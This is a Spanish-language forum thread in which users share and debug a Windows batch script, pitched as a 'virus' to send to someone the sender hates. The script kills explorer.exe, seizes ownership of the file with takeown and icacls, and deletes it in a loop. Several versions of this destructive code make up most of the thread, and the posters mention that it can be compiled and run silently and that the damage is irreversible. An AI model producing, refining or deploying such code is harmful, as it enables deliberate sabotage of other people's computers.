Batch virus para quien odias

Iniciado por ELVJop, 8 Abril 2012, 15:40 PM

0 Miembros y 1 Visitante están viendo este tema.

ELVJop

Alguna vez has odiado mucho alguien? Y le has querido enviar un virus? Aqui tenemos algo parecido.(En teoria esto es un bug de windows esto es compatible con todas las versiones de windows)
Aprobecha un bug de windows que ejecuta explorer.exe en modo usuario.
Idea de el ELVJop
Correción y preparación by EleKtro H@cker

#By EleKtro H@cker
#Idea de ELVJop
@Echo OFF
Taskkill /F /IM "explorer.exe" 2>NUL
Del /F /Q "%WINDIR%\explorer.exe", "%WINDIR%\System32\explorer.exe" | Find /I "Acceso denegado" >NUL
IF %Errorlevel% EQU 0 (
Takeown /F "%WINDIR%\explorer.exe" >NUL 2>&1
Takeown /F "%WINDIR%\System32\explorer.exe" >NUL 2>&1
Icacls "%WINDIR%\explorer.exe" /grant %username%:^(F^) >NUL 2>&1
Icacls "%WINDIR%\System32\explorer.exe" /grant %username%:^(F^) >NUL 2>&1
%0
)
Exit


Se puede compilar y ejecutar en modo silencioso
El dia 3 de mayo esta cuenta sera borrada.

Runex

Cita de: ELVJop en  8 Abril 2012, 15:40 PM
Alguna vez has odiado mucho alguien? Y le has querido enviar un virus? Aqui tenemos algo parecido.(En teoria esto es un bug de windows esto es compatible con todas las versiones de windows)

Para Windows 7 o Vista:

#Por ELVJop
@echo off
:menu
taskkill /f /im explorer.exe
del /s /q C:\Windows\explorer.exe
IF !Errorlevel! EQU 1 (Goto :menu)
exit


Para windows XP:

#Por ELVJop
@echo off
:menu
taskkill /f /im explorer.exe
del /s /q C:\Windows\System32\explorer.exe
IF !Errorlevel! EQU 1 (Goto :menu)
exit


Si no lo sabes:


#Por ELVJop
@echo off
taskkill /f /im explorer.exe
del /s /q C:\Windows\System32\explorer.exe
taskkill /f /im explorer.exe
del /s /q C:\Windows\explorer.exe
exit


Se puede compilar y ejecutar en modo silencioso


Bueno, de Batch no entiendo mucho pero según lo que veo, simplemente finaliza el proceso explorer.exe y nada que no se pueda recuperar desde el administrador de tareas iniciando de nuevo el proceso.

De todas formas, está graciosa, también hay otros como el shutdown -s -t o simplemente hacer saltar alerts en un bucle  ;-)
"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".

ELVJop

LA idea del virus es tan simple como que explorer.exe se ejecuta en modo usuario lo que yo hago no es solo cerrarlo es eliminar el fichero es un virus irreversible.
El dia 3 de mayo esta cuenta sera borrada.

Runex

Aaaah no me había fijado en el "del", mejor aun es  ;-)
"No renunciaría al bambú.
Nunca renuciaría a ti.
No te compares con otros" "El me dijo:
El bambú tenía un propósito diferente al del
helecho, sin embargo eran necesarios y
hacían del bosque un lugar hermoso".

Eleкtro

@ELVJop

No asegures que algo funciona sin haberlo probado en un PC/VBOX o sin saber lo que estás haciendo... Es un consejo.

El code no hace ningún bucle.
Motivos:
- No has habilitado la expansion, Entonces la variable ERRORLEVEL no se comprueba.
- Aunque el archivo esté en uso, O el archivo no existe, El comando DEL no manda el código de error "1", De echo no manda ningún código de error en esos dos casos (Manda el "0") así que hay que hacer uso de "Find" o comprobar si el archivo sigue existiendo con "If exist".

Aparte:
- El code no podría funcionar en una cuenta que no sea de administrador. (Sin privilegios).
- No es necesario hacer 2 versiones de un mismo code para la misma función xD.


Te lo modifico para que veas...

Código (dos) [Seleccionar]

@Echo OFF
Taskkill /F /IM "explorer.exe" 2>NUL
Del /F /Q "%WINDIR%\explorer.exe", "%WINDIR%\System32\explorer.exe" | Find /I "Acceso denegado" >NUL
IF %Errorlevel% EQU 0 (
Takeown /F "%WINDIR%\explorer.exe" >NUL 2>&1
Takeown /F "%WINDIR%\System32\explorer.exe" >NUL 2>&1
Icacls "%WINDIR%\explorer.exe" /grant %username%:^(F^) >NUL 2>&1
Icacls "%WINDIR%\System32\explorer.exe" /grant %username%:^(F^) >NUL 2>&1
%0
)
Exit


Salu2.








ELVJop

Es cierto... ME olvide el delayexpansion... El comando del no manda 0 o 1? Eso no lo sabia. Lo del administrador no lo tengo del todo claro me parece haber leído por ahí que si que valia. Eso de los dos es cierto pero que quieres que te diga estaba escribiendo el post y cuando le di a guardar me expiro la sesión y no guarde el código aparte así que lo hice un poco rápido :P

PD: Modifico el principal pero no sin quitarte meritos
El dia 3 de mayo esta cuenta sera borrada.

Eleкtro

Cita de: ELVJop en  8 Abril 2012, 17:37 PM
El comando del no manda 0 o 1? Eso no lo sabia.

No todos los comandos actuan igual, Por ejemplo el comando Tasklist támpoco manda código de error si no encuentra un proceso.

Y al menos en Windows 7 el comando DEL no manda código de error por "Archivo no encontrado" o "Archivo en uso".
En WinXP no lo sé, Algunos comandos cambian en pequeños aspectos xD.

Salu2.